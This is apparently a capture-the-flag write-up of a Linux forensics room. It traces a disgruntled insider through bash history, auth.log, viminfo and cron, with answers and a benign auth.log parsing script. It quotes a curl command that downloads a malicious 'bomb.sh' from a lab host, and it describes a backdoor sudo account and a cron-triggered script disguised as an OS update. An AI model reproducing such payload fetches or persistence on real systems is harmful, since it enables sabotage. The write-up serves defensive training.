# Disgruntled TryHackMe

#### Task 3 Nothing suspicious... So far

Here’s the machine our disgruntled IT user last worked on. Check if there’s anything our client needs to be worried about.

My advice: Look at the privileged commands that were run. That should get you started.

Q1) The user installed a package on the machine using elevated privileges. According to the logs, what is the full COMMAND?

{% hint style="info" %}
Check the sudo execution history.
{% endhint %}

We can investigate the `.bash_history` file under the `/home` directory.

<figure><img src="/files/cwuI0pnVbLHKmuAEjFZ0" alt=""><figcaption><p>cat /home/cybert/.bash_history</p></figcaption></figure>

<figure><img src="/files/mFW0tm7IiWnpRACkfpIl" alt=""><figcaption></figcaption></figure>

```
sudo apt install dokuwiki
```

**Ans : /usr/bin/apt install dokuwiki**

**Q2) What was the present working directory (PWD) when the previous command was run?**

By looking in `/home`.

**Ans : /home/cybert**

#### Task 4 Let’s see if you did anything bad

Keep going. Our disgruntled IT was supposed to only install a service on this computer, so look for commands that are unrelated to that.

Q3) Which user was created after the package from the previous task was installed?

By looking at the second screenshot we found **sudo adduser it-admin**.

**Ans : it-admin**

**Q4) A user was then later given sudo privileges. When was the sudoers file updated? (Format: Month Day HH:MM:SS)**

Let's investigate the log files:

```
vim /var/log/auth.log
```


<figure><img src="/files/uIuyR8b15qQj7zbVRpLq" alt=""><figcaption></figcaption></figure>

I found it:

<figure><img src="/files/pLp0ElsPLqqaOrvS3l66" alt=""><figcaption></figcaption></figure>

**Ans : Dec 28 06:27:34**
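The questions in Tasks 3 and 4 are all answered from the `sudo` lines in `/var/log/auth.log`, which record the invoking user, the `PWD` and the full `COMMAND`. The following script is an added example (not part of the room or this writeup) that parses a constructed sample of such lines and pulls out the package install, the users created and the sudoers edits; the hostname `labhost` and the timestamps are made up.

```python
import re
from typing import Dict, List, Optional

# Constructed sample of the sudo lines /var/log/auth.log records (syslog format).
# Hostname, timestamps and ordering are made up for this example, not the room's log.
SAMPLE_AUTH_LOG = """\
Dec 28 06:10:01 labhost sudo:   cybert : TTY=pts/0 ; PWD=/home/cybert ; USER=root ; COMMAND=/usr/bin/apt install dokuwiki
Dec 28 06:10:02 labhost sudo: pam_unix(sudo:session): session opened for user root by cybert(uid=0)
Dec 28 06:12:10 labhost sudo:   cybert : TTY=pts/0 ; PWD=/home/cybert ; USER=root ; COMMAND=/usr/sbin/adduser it-admin
Dec 28 06:15:44 labhost sudo:   cybert : TTY=pts/0 ; PWD=/home/cybert ; USER=root ; COMMAND=/usr/sbin/visudo
Dec 28 06:20:00 labhost sudo: it-admin : TTY=pts/1 ; PWD=/home/it-admin ; USER=root ; COMMAND=/usr/bin/vi bomb.sh
"""

# One sudo invocation per line: who ran it, from which PWD, as which user, and the full COMMAND.
SUDO_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sudo:\s+(?P<user>\S+) : "
    r"TTY=(?P<tty>\S+) ; PWD=(?P<pwd>\S+) ; USER=(?P<runas>\S+) ; COMMAND=(?P<cmd>.*)$"
)
PACKAGE_MANAGERS = {"/usr/bin/apt", "/usr/bin/apt-get", "/usr/bin/dpkg", "/usr/bin/dnf", "/usr/bin/yum"}
USER_ADD_TOOLS = {"/usr/sbin/adduser", "/usr/sbin/useradd"}


def parse_sudo_events(log_text: str) -> List[Dict[str, str]]:
    """Keep only sudo COMMAND lines; pam_unix session lines carry no command and are skipped."""
    return [m.groupdict() for m in map(SUDO_RE.match, log_text.splitlines()) if m]


def first_package_install(events: List[Dict[str, str]]) -> Optional[Dict[str, str]]:
    """First elevated package-manager 'install' (gives both the COMMAND and the PWD)."""
    for e in events:
        argv = e["cmd"].split()
        if argv and argv[0] in PACKAGE_MANAGERS and "install" in argv[1:]:
            return e
    return None


def users_created(events: List[Dict[str, str]]) -> List[str]:
    """Usernames passed to adduser/useradd via sudo, in log order."""
    return [e["cmd"].split()[-1] for e in events if e["cmd"].split()[0] in USER_ADD_TOOLS]


def sudoers_edits(events: List[Dict[str, str]]) -> List[str]:
    """Timestamps of commands that change the sudoers policy (visudo or anything touching /etc/sudoers)."""
    return [e["ts"] for e in events if e["cmd"].split()[0].endswith("/visudo") or "/etc/sudoers" in e["cmd"]]


if __name__ == "__main__":
    evs = parse_sudo_events(SAMPLE_AUTH_LOG)
    for e in evs:  # compact timeline of every privileged command
        print(f'{e["ts"]}  {e["user"]:<9} PWD={e["pwd"]:<16} {e["cmd"]}')
    print("package install:", first_package_install(evs))
    print("users created:", users_created(evs), "sudoers edited at:", sudoers_edits(evs))
```

On a real host, read the file contents into `parse_sudo_events` instead of the constructed sample; rotated copies (`auth.log.1`, `auth.log.*.gz`) need to be checked too, since the events of interest may predate the current file.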

**Q5) A script file was opened using the "vi" text editor. What is the name of this file?**

Remember the created account? Let's investigate the bash history in its home directory.

<figure><img src="/files/e4dVFoDv3dbXzCl63UJb" alt=""><figcaption></figcaption></figure>

**Ans : bomb.sh**

#### Task 5 Bomb has been planted. But when and where?

That `bomb.sh` file is a huge red flag! While a file is already incriminating in itself, we still need to find out where it came from and what it contains. The problem is that the file does not exist anymore.

**Q6) What is the command used that created the file bomb.sh?**

**From the previous screenshot**

**Ans : curl 10.10.158.38:8080/bomb.sh --output bomb.sh**

**Q7) The file was renamed and moved to a different directory. What is the full path of this file now?**

The vi text editor can edit and save files to a different location, and it keeps a record of the files it recently opened in the `viminfo` file.

Let's investigate viminfo:

<figure><img src="/files/5cZEtM7kRBCANW5Ccsij" alt=""><figcaption></figcaption></figure>


<figure><img src="/files/vsU8KZzh1gz7ZStuTbMh" alt=""><figcaption></figcaption></figure>

**Ans : /bin/os-update.sh**

**Q8) When was the file from the previous question last modified? (Format: Month Day HH:MM)**

<figure><img src="/files/6isWrOUak6xpm8HLQysG" alt=""><figcaption><p>easy :)</p></figcaption></figure>

**Ans : Dec 28 06:29**

**Q9) What is the name of the file that will get created when the file from the first question executes?**

<figure><img src="/files/gSZmrz4ABf5WvATmtDoh" alt=""><figcaption><p>the file is goodbye.txt</p></figcaption></figure>

**Ans : goodbye.txt**

#### Task 6 Following the fuse

So we have a file and a motive. The question we now have is: how will this file be executed?

**Q10) At what time will the malicious file trigger? (Format: HH:MM AM/PM)**

<figure><img src="/files/FBg9EVbvuhFg7Speog9E" alt=""><figcaption></figcaption></figure>

By entering the cron schedule at <https://crontab.guru/>:


<figure><img src="/files/YTy6IIPrGVvDzHO5nVwc" alt=""><figcaption></figcaption></figure>

**Ans : 08:00 AM**

**I think the challenge is not easy, it's very easy** :smile: <3
